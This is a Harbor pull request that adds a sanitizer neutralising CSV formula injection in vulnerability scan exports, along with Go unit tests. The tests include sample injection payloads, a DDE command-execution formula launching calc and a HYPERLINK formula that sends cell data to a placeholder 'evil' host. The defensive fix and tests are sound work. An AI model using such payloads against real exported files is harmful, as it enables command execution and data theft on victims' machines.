### PR TITLE
fix: neutralize CSV formula in scan export

### DIFF
--- a/src/pkg/scan/export/csv_sanitize_test.go
+++ b/src/pkg/scan/export/csv_sanitize_test.go
@@ -1,0 +1,71 @@
+// Copyright Project Harbor Authors
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//    http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+package export
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+func TestSanitizeCSVCell(t *testing.T) {
+	tests := []struct {
+		name string
+		in   string
+		want string
+	}{
+		{"equals", "=cmd|'/c calc'!A1", "'=cmd|'/c calc'!A1"},
+		{"plus", "+1+1", "'+1+1"},
+		{"minus", "-2+3", "'-2+3"},
+		{"at_scoped_npm", "@evil/pkg", "'@evil/pkg"},
+		{"tab", "\tx", "'\tx"},
+		{"carriage_return", "\rx", "'\rx"},
+		{"hyperlink", `=HYPERLINK("http://evil/"&A1)`, `'=HYPERLINK("http://evil/"&A1)`},
+		{"benign_package", "libssl1.1", "libssl1.1"},
+		{"benign_version", "1.2.3", "1.2.3"},
+		{"benign_cve", "CVE-2025-0001", "CVE-2025-0001"},
+		{"empty", "", ""},
+	}
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			assert.Equal(t, tt.want, sanitizeCSVCell(tt.in), "sanitizeCSVCell(%q)", tt.in)
+		})
+	}
+}
+
+func TestDataSanitizeForCSV(t *testing.T) {
+	d := Data{
+		Repository:     "attacker/app",
+		ArtifactDigest: "sha256:deadbeef",
+		CVEId:          "CVE-2026-0001",
+		Package:        "@evil/pkg",
+		Version:        "=cmd|'/c calc'!A1",
+		FixVersion:     "+1+1",
+		Severity:       "High",
+		CWEIds:         "-2+3",
+		AdditionalData: `=HYPERLINK("http://evil/"&A1)`,
+		ScannerName:    "Trivy",
+	}
+	d.sanitizeForCSV()
+	assert.Equal(t, "'@evil/pkg", d.Package)
+	assert.Equal(t, "'=cmd|'/c calc'!A1", d.Version)
+	assert.Equal(t, "'+1+1", d.FixVersion)
+	assert.Equal(t, "'-2+3", d.CWEIds)
+	assert.Equal(t, `'=HYPERLINK("http://evil/"&A1)`, d.AdditionalData)
+	// Benign fields are untouched.
+	assert.Equal(t, "attacker/app", d.Repository)
+	assert.Equal(t, "CVE-2026-0001", d.CVEId)
+	assert.Equal(t, "Trivy", d.ScannerName)
+}

--- a/src/pkg/scan/export/manager.go
+++ b/src/pkg/scan/export/manager.go
@@ -19,6 +19,7 @@ import (
 	"encoding/json"
 	"errors"
 	"fmt"
+	"strings"
 
 	beego_orm "github.com/beego/beego/v2/client/orm"
 
@@ -137,7 +138,39 @@ func (em *exportManager) Fetch(ctx context.Context, params Params) ([]Data, erro
 		return nil, err
 	}
 
+	for i := range exportData {
+		exportData[i].sanitizeForCSV()
+	}
+
 	return exportData, nil
+}
+
+// csvFormulaTriggers lists the leading characters a spreadsheet may interpret as
+// the start of a formula when opening an exported CSV.
+const csvFormulaTriggers = "=+-@\t\r"
+
+// sanitizeCSVCell prefixes a single quote to any value that would otherwise be
+// evaluated as a formula, neutralizing CSV formula injection.
+func sanitizeCSVCell(value string) string {
+	if len(value) > 0 && strings.IndexByte(csvFormulaTriggers, value[0]) >= 0 {
+		return "'" + value
+	}
+	return value
+}
+
+// sanitizeForCSV neutralizes every exported (untrusted, scanner-derived) string
+// field of a row before it is marshaled to CSV.
+func (d *Data) sanitizeForCSV() {
+	d.Repository = sanitizeCSVCell(d.Repository)
+	d.ArtifactDigest = sanitizeCSVCell(d.ArtifactDigest)
+	d.CVEId = sanitizeCSVCell(d.CVEId)
+	d.Package = sanitizeCSVCell(d.Package)
+	d.Version = sanitizeCSVCell(d.Version)
+	d.FixVersion = sanitizeCSVCell(d.FixVersion)
+	d.Severity = sanitizeCSVCell(d.Severity)
+	d.CWEIds = sanitizeCSVCell(d.CWEIds)
+	d.AdditionalData = sanitizeCSVCell(d.AdditionalData)
+	d.ScannerName = sanitizeCSVCell(d.ScannerName)
 }
 
 func (em *exportManager) buildQuery(ctx context.Context, params Params) (beego_orm.RawSeter, error) {


### PR DESCRIPTION
fixes #23679 
Neutralize such cells by prefixing a single quote, applied over every exported field in exportManager.Fetch so both the Marshal and MarshalWithoutHeaders paths are covered. Adds unit tests for the sanitizer.

Thank you for contributing to Harbor!

# Comprehensive Summary of your change

# Issue being fixed
Fixes #(issue)

Please indicate you've done the following:
- [ ] Well Written Title and Summary of the PR
- [ ] Label the PR as needed. "release-note/ignore-for-release, release-note/new-feature, release-note/update, release-note/enhancement, release-note/community, release-note/breaking-change, release-note/docs, release-note/infra, release-note/deprecation"
- [ ] Accepted the DCO. Commits without the DCO will delay acceptance.
- [ ] Made sure tests are passing and test coverage is added if needed.
- [ ] Considered the docs impact and opened a new docs issue or PR with docs changes if needed in [website repository](https://github.com/goharbor/website).
